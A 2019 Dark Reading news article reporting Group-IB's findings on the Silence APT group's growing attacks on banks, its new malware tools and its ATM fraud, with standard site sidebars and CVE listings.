Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Attacks/Breaches

8/21/2019
05:55 PM
Connect Directly
Twitter
LinkedIn
RSS
E-Mail
50%
50%

Silence APT Group Broadens Attacks on Banks, Gets More Dangerous

Over the past year, the financial damage linked to the Russian-speaking threat group has spiked fivefold, Group-IB says.

The Russian-language-speaking Silence APT group appears to be evolving into a major threat to banks and financial institutions everywhere, but especially so in Asia, Europe, Russia, and the former Soviet Union states.

Singapore-based security firm Group-IB, which has been tracking Silence since 2016, says over the past year the threat group has sharply increased the frequency of its attacks, begun targeting organizations in over two dozen countries, and added new weapons to its malware arsenal.

Some of the malware it has begun using suggests a link with TA505, a threat group perhaps best known for distributing the Dridex banking Trojan and other malware via very high-volume spam campaigns, Group-IB said this week. 

Between last September, when Group-IB first released a detailed report on Silence APT, and now, confirmed total financial losses stemming from the group's activities has surged fivefold — from around $800,000 to $4.2 million, the security firm said.

Rustam Mirkasymov, threat intelligence expert at Group-IB, says Silence has evolved from being a mistake-prone, copycat group to one of the most sophisticated threat actors targeting organizations in the financial sector in Russia, Europe and Asia.

"Given that the gang represents a growing threat to the financial sector worldwide, banks and financial organizations need to be aware of the threat," he says. "Know their tactics and rapidly evolving tools to be able to detect and prevent the gang’s attacks at early stages."  

Silence APT's typical modus operandi has been to try and gain initial access to a target bank network via malware embedded in phishing emails. It has then used that foothold to look for and plant malware on banking systems that allow money mules to later make fraudulent withdrawals from the bank's ATMs.

In one such campaign earlier this year, the group is believed to have stolen some $3 million from Dutch-Bangla Bank's ATMs. In other attacks, the Silence APT group has similarly fraudulently withdrawn hundreds of thousands of dollars from banks in India, Russia, Bulgaria, and other nations.

Since October 2018, Group-IB researchers have observed the Silence APT group employ a new tactic for deploying its initial malware. Before sending out malware-laden phishing emails, the group has been sending out malware-free reconnaissance emails to intended targets to ensure the emails work and to also gather information on any antivirus tools being used. Group-IB researchers observed at least three campaigns over the last year in which Silence sent out tens of thousands of these recon emails to banks in a wide swath of countries, including Malaysia, Singapore, China, and Indonesia.

"Silence usually spends a little more time at the preparation stage than other financially motivated cybercriminals do," Mirkasymov says. "[They] are extremely motivated and are willing to try out new tools and tactics," typically after first carefully studying how other groups are using them, he says.

New Tools, New Capabilities
Among the new tools the group has begun using over the past year is a fileless loader written in PowerShell called Ivoke; EDA, another malicious PowerShell tool based on the Empire PowerShell post-exploitation agent; and xfs-disp.exe, a Trojan for attacking ATMs.

The Silence group has also encrypted and completely changed the execution logic of TruBot, its main malware downloader. In addition, the group has changed the communication protocol for communications between infected systems and the command-and-control server.

A lot of the changes appear to have been inspired by the growing attention that the APT actor has been receiving from the research community recently. "Silence has made a number of changes to their toolset with one goal: to complicate detection by security tools," Mirkasymov said.

Group-IB has previously described Silence APT as starting out as a relatively unsophisticated two-person outfit — one with knowledge of banking systems and the other skilled at reverse-engineering and building malware. Their tactics and actions suggested they were either working in legitimate information security roles or had previously worked in one when they launched their criminal operations, Group-IB has previously assessed.

Since then, Silence appears to have rapidly grown, based on the frequency and the expanded geography of its attacks, Mirkasymov says. In addition, Silence sometimes relies on third-party developers, which indicates the group has an extensive list of contacts in underground markets, he notes.

"We assess with high confidence that Silence will continue enhancing their arsenal and increasing frequency and scale of their attacks worldwide," he says.

Related Content:

Check out The Edge, Dark Reading's new section for features, threat data, and in-depth perspectives. Today's top story: "How to Avoid Technical Debt in Open Source Projects."

 

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ... View Full Bio
 

Recommended Reading:

Comment  | 
Print  | 
More Insights
Comments
Newest First  |  Oldest First  |  Threaded View
Edge-DRsplash-10-edge-articles
7 Old IT Things Every New InfoSec Pro Should Know
Joan Goodchild, Staff Editor,  4/20/2021
News
Cloud-Native Businesses Struggle With Security
Robert Lemos, Contributing Writer,  5/6/2021
Commentary
Defending Against Web Scraping Attacks
Rob Simon, Principal Security Consultant at TrustedSec,  5/7/2021
Register for Dark Reading Newsletters
White Papers
Video
Cartoon Contest
Write a Caption, Win an Amazon Gift Card! Click Here
Latest Comment: This comment is waiting for review by our moderators.
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2021-29043
PUBLISHED: 2021-05-17
The Portal Store module in Liferay Portal 7.0.0 through 7.3.5, and Liferay DXP 7.0 before fix pack 97, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 1 does not obfuscate the S3 store's proxy password, which allows attackers to steal the proxy password via man-in-the-middle a...
CVE-2021-29044
PUBLISHED: 2021-05-17
Cross-site scripting (XSS) vulnerability in the Site module's membership request administration pages in Liferay Portal 7.0.0 through 7.3.5, and Liferay DXP 7.0 before fix pack 97, 7.1 before fix pack 21, 7.2 before fix pack 10 and 7.3 before fix pack 1 allows remote attackers to inject arbitrary we...
CVE-2021-29045
PUBLISHED: 2021-05-17
Cross-site scripting (XSS) vulnerability in the Redirect module's redirection administration page in Liferay Portal 7.3.2 through 7.3.5, and Liferay DXP 7.3 before fix pack 1 allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_redirect_web_internal_portlet_RedirectPor...
CVE-2021-29046
PUBLISHED: 2021-05-17
Cross-site scripting (XSS) vulnerability in the Asset module's category selector input field in Liferay Portal 7.3.5 and Liferay DXP 7.3 before fix pack 1, allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_asset_categories_admin_web_portlet_AssetCategoriesAdminPortl...
CVE-2021-29053
PUBLISHED: 2021-05-17
Multiple SQL injection vulnerabilities in Liferay Portal 7.3.5 and Liferay DXP 7.3 before fix pack 1 allow remote authenticated users to execute arbitrary SQL commands via the classPKField parameter to (1) CommerceChannelRelFinder.countByC_C, or (2) CommerceChannelRelFinder.findByC_C.